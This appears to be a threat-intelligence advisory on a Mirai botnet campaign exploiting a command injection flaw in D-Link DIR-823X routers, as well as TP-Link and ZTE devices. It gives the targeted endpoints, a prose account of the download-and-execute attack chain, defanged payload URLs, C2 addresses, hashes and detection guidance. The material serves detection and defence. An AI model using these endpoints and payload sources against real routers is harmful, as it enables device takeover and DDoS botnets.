CVE-2025-29635: Mirai Campaign Targets D-Link Devices

Key Takeaways

• Threat actors are actively exploiting CVE-2025-29635, a command injection flaw in discontinued D-Link DIR-823X routers.
• The campaign deploys a Mirai botnet variant named 'tuxnokill' that contains a hardcoded anti-AI string 'AI.NEEDS.TO.DIE'.
• The attackers are also targeting TP-Link Archer AX21 devices (CVE-2023-1389) and ZTE ZXV10 H108L routers.
• Exploitation involves sending malicious POST requests to specific endpoints to download and execute shell scripts.

Affected Systems

• D-Link DIR-823X series routers (firmware versions 240126 and 24082)
• TP-Link Archer AX21 devices
• ZTE ZXV10 H108L routers

Vulnerabilities (CVEs)

• CVE-2025-29635
• CVE-2023-1389

Attack Chain

The attack begins with a malicious HTTP POST request targeting vulnerable endpoints on D-Link, TP-Link, or ZTE routers. This request exploits a command injection flaw to execute a chain of commands using native tools like wget, curl, or tftp to download a shell script. The shell script then fetches, changes permissions for, and executes the 'tuxnokill' Mirai malware payload. Once running, the malware connects to its command and control server to receive further instructions, such as initiating DDoS attacks.

Detection Availability

• YARA Rules: Yes
• Sigma Rules: No
• Snort/Suricata Rules: Yes
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No
• Platforms: Snort, YARA

The article provides a Snort rule to detect network traffic to the botnet infrastructure and a YARA rule to identify files containing Mirai-associated strings and hashes.

Detection Engineering Assessment

EDR Visibility: Low — The targeted devices are consumer-grade IoT routers which typically do not support the installation of EDR agents. Network Visibility: High — The initial exploitation occurs via cleartext HTTP POST requests, and subsequent payload downloads utilize unencrypted protocols like HTTP, TFTP, and FTP. Detection Difficulty: Moderate — While network signatures can easily catch the specific exploit paths and known IPs, the lack of internal logging on IoT devices makes endpoint-level detection difficult.

Required Log Sources

• Web Proxy Logs
• Firewall Logs
• Network IDS/IPS

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for inbound HTTP POST requests to /goform/set_prohibiting containing shell metacharacters or common download tools (wget, curl) in the request body.	Web Proxy Logs / WAF Logs	Initial Access	Low
Search for outbound network connections from IoT device subnets to unexpected external IP addresses over ports 80, 21, or 69 (TFTP).	Firewall Logs	Command and Control / Execution	Medium

Control Gaps

• Lack of EDR visibility on IoT and network edge devices
• Continued use of unpatched or end-of-life hardware in production environments

Key Behavioral Indicators

• HTTP POST requests to /goform/set_prohibiting
• User-Agent 'Go-http-client/1.1' in exploit attempts
• Presence of 'AI.NEEDS.TO.DIE' string in network streams or memory

False Positive Assessment

• Low, as the specific URI paths, hardcoded payload strings, and known malicious IPs are highly indicative of this specific Mirai botnet campaign.

Recommendations

Immediate Mitigation

• Block inbound access to router management interfaces from the public internet.
• Block outbound traffic to the identified C2 (64.89.161.130) and downloader (88.214.20.14) IP addresses.

Infrastructure Hardening

• Replace end-of-life D-Link DIR-823X routers with supported hardware.
• Apply the latest firmware patches to TP-Link and ZTE devices.
• Segment IoT and network devices into isolated VLANs with restricted outbound access.

User Protection

• Ensure default credentials on all network devices are changed to strong, unique passwords.

Security Awareness

• Educate IT and procurement staff on the risks of maintaining end-of-life hardware in the environment.

MITRE ATT&CK Mapping

• T1190 - Exploit Public-Facing Application
• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1105 - Ingress Tool Transfer
• T1071.001 - Application Layer Protocol: Web Protocols

Additional IOCs

• Urls:
  • hxxp://88[.]214[.]20[.]14/dlink.sh - URL used to download the initial shell script for D-Link devices.
  • hxxp://88[.]214[.]20[.]14/tplinkwan.sh - URL used to download the initial shell script for TP-Link devices.
  • hxxp://88[.]214[.]20[.]14/bins/tux.mips - URL used to download the Mirai MIPS payload.
  • /manager_dev_ping_t - Endpoint targeted for ZTE ZXV10 H108L router exploitation.
• File Hashes:
  • be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b (SHA256) - Mirai malware payload variant hash.
  • d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7 (SHA256) - Mirai malware payload variant hash.
  • 7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8 (SHA256) - Mirai malware payload variant hash.
  • 72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8 (SHA256) - Mirai malware payload variant hash.
• File Paths:
  • /tmp/dlink.sh - Path where the downloaded shell script is saved and executed.
  • /tmp/tux.mips - Path where the downloaded Mirai binary is saved and executed.
• Command Lines:
  • Purpose: Download and execute the initial shell script payload to fetch the Mirai botnet binary. | Tools: wget, curl, tftp, ftpget, chmod, sh | Stage: Execution
• Other:
  • AI.NEEDS.TO.DIE - Hardcoded string found within the Mirai malware payload.
  • segmentation fault (core dumped) - Hardcoded console execution string standard with Mirai payloads.